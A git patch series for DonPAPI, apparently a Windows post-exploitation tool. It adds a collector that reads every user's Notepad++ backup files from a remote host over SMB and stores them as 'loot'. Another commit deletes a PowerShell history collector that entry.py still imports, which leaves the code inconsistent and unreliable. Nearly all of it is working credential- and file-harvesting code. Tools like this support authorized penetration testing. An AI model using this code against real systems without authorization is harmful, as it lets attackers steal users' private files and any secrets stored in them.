From a06ca5e8a6c344a4701fc49978cff829b44bc114 Mon Sep 17 00:00:00 2001 From: Deft_ Date: Thu, 17 Oct 2024 15:26:46 +0200 Subject: [PATCH 1/4] Update entry.py --- donpapi/entry.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/donpapi/entry.py b/donpapi/entry.py index 8fdaab1..f6cc122 100644 --- a/donpapi/entry.py +++ b/donpapi/entry.py @@ -40,6 +40,7 @@ from donpapi.collectors.recent_files import FilesDump, TAG as FilesTag from donpapi.collectors.sccm import SCCMDump, TAG as SCCMTag from donpapi.collectors.mremoteng import MRemoteNgDump, TAG as MRemoteNgTag from donpapi.collectors.vnc import VNCDump, TAG as VNCTag +from donpapi.collectors.notepadpp import NotepadPPDump, TAG as NotepadPPTag from donpapi.collectors.powershellhistory import PowerShellHistoryDump, TAG as PowerShellHistoryTag from donpapi.lib.config import DonPAPIConfig, parse_config_file from donpapi.lib.database import Database, create_db_engine @@ -63,7 +64,8 @@ COLLECTORS_LIST = { VaultsTag: VaultsDump, VNCTag: VNCDump, WifiTag: WifiDump, - PowerShellHistoryTag: PowerShellHistoryDump + PowerShellHistoryTag: PowerShellHistoryDump, + NotepadPPTag: NotepadPPDump } def set_main_logger(logger , host = "\U0001F480"): From 1afae5f083798cc5cb36fedfd594cc3173c870b0 Mon Sep 17 00:00:00 2001 From: Deft_ Date: Thu, 17 Oct 2024 15:27:14 +0200 Subject: [PATCH 2/4] Create notepadpp.py --- donpapi/collectors/notepadpp.py | 61 +++++++++++++++++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 donpapi/collectors/notepadpp.py diff --git a/donpapi/collectors/notepadpp.py b/donpapi/collectors/notepadpp.py new file mode 100644 index 0000000..39d2a4b --- /dev/null +++ b/donpapi/collectors/notepadpp.py @@ -0,0 +1,61 @@ +import os +import ntpath +from typing import Any +from dploot.lib.target import Target +from dploot.lib.smb import DPLootSMBConnection +from donpapi.core import DonPAPICore +from donpapi.lib.logger import DonPAPIAdapter + + +TAG = "NotepadPP" + +class NotepadPPDump: + false_positive = [".", "..", "desktop.ini", "Public", "Default", "Default User", "All Users", ".NET v4.5", ".NET v4.5 Classic"] + user_directories = ["Users\\{username}\\AppData\\Roaming\\Notepad++\\backup\\"] + max_filesize = 5000000 + + def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore) -> None: + self.target = target + self.conn = conn + self.masterkeys = masterkeys + self.options = options + self.logger = logger + self.context = context + self.found = 0 + + def run(self): + + self.logger.display("Gathering notepad++ backup files") + for user in self.context.users: + for directory in self.user_directories: + directory_path = directory.format(username=user) + self.dig_files(directory_path=directory_path, recurse_level=0, recurse_max=10) + self.logger.secret(f"Found {self.found} notepad++ backup files", TAG) + + def dig_files(self, directory_path, recurse_level=0, recurse_max=10): + directory_list = self.conn.remote_list_dir(self.context.share, directory_path) + if directory_list is not None: + for item in directory_list: + if item.get_longname() not in self.false_positive: + self.found += 1 + new_path = ntpath.join(directory_path, item.get_longname()) + file_content = self.conn.readFile(self.context.share, new_path) + local_filepath = os.path.join(self.context.output_dir, *(new_path.split('\\'))) + # Stores the file in loot\TARGET\Users\{username}\AppData\ + os.makedirs(os.path.dirname(local_filepath), exist_ok=True) + with open(local_filepath, "wb") as f: + if file_content is None: + file_content = b"" + f.write(file_content) + + # Stores files in loot\PowerShellHistory + os.makedirs(f"{self.context.output_dir}/../NotepadPP", exist_ok=True) + local_filepath = os.path.join( + f"{self.context.output_dir}/../NotepadPP", + f"{item.get_longname()}-{self.found}" + ) + with open(local_filepath, "wb") as f: + if file_content is None: + file_content = b"" + f.write(file_content) + From 9947dae00a7eb98fd176810cac143cef90678b5d Mon Sep 17 00:00:00 2001 From: Deft_ Date: Thu, 17 Oct 2024 15:35:10 +0200 Subject: [PATCH 3/4] Delete donpapi/collectors/powershellhistory.py --- donpapi/collectors/powershellhistory.py | 61 ------------------------- 1 file changed, 61 deletions(-) delete mode 100644 donpapi/collectors/powershellhistory.py diff --git a/donpapi/collectors/powershellhistory.py b/donpapi/collectors/powershellhistory.py deleted file mode 100644 index e5f87a9..0000000 --- a/donpapi/collectors/powershellhistory.py +++ /dev/null @@ -1,61 +0,0 @@ -import os -import ntpath -from typing import Any -from dploot.lib.target import Target -from dploot.lib.smb import DPLootSMBConnection -from donpapi.core import DonPAPICore -from donpapi.lib.logger import DonPAPIAdapter - - -TAG = "PowerShellHistory" - -class PowerShellHistoryDump: - false_positive = [".", "..", "desktop.ini", "Public", "Default", "Default User", "All Users", ".NET v4.5", ".NET v4.5 Classic"] - user_directories = ["\\Users\\{username}\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\"] - max_filesize = 5000000 - - def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore) -> None: - self.target = target - self.conn = conn - self.masterkeys = masterkeys - self.options = options - self.logger = logger - self.context = context - self.found = 0 - - def run(self): - - self.logger.display("Gathering powershell history files") - for user in self.context.users: - for directory in self.user_directories: - directory_path = directory.format(username=user) - self.dig_files(directory_path=directory_path, recurse_level=0, recurse_max=10) - self.logger.secret(f"Found {self.found} powershell history files", TAG) - - def dig_files(self, directory_path, recurse_level=0, recurse_max=10): - directory_list = self.conn.remote_list_dir(self.context.share, directory_path) - if directory_list is not None: - for item in directory_list: - if item.get_longname() not in self.false_positive: - self.found += 1 - new_path = ntpath.join(directory_path, item.get_longname()) - file_content = self.conn.readFile(self.context.share, new_path) - local_filepath = os.path.join(self.context.output_dir, *(new_path.split('\\'))) - # Stores the file in loot\TARGET\Users\{username}\AppData\ - os.makedirs(os.path.dirname(local_filepath), exist_ok=True) - with open(local_filepath, "wb") as f: - if file_content is None: - file_content = b"" - f.write(file_content) - - # Stores files in loot\PowerShellHistory - os.makedirs(f"{self.context.output_dir}/../PowerShellHistory", exist_ok=True) - local_filepath = os.path.join( - f"{self.context.output_dir}/../PowerShellHistory", - f"{item.get_longname()}-{self.found}" - ) - with open(local_filepath, "wb") as f: - if file_content is None: - file_content = b"" - f.write(file_content) - From 31584d5bdb98a1cdb03772572794b59f42b43a9a Mon Sep 17 00:00:00 2001 From: Deft_ Date: Fri, 18 Oct 2024 08:01:33 +0200 Subject: [PATCH 4/4] Update notepadpp.py --- donpapi/collectors/notepadpp.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/donpapi/collectors/notepadpp.py b/donpapi/collectors/notepadpp.py index 39d2a4b..39d78e0 100644 --- a/donpapi/collectors/notepadpp.py +++ b/donpapi/collectors/notepadpp.py @@ -48,7 +48,7 @@ class NotepadPPDump: file_content = b"" f.write(file_content) - # Stores files in loot\PowerShellHistory + # Stores files in loot\NotepadPP os.makedirs(f"{self.context.output_dir}/../NotepadPP", exist_ok=True) local_filepath = os.path.join( f"{self.context.output_dir}/../NotepadPP",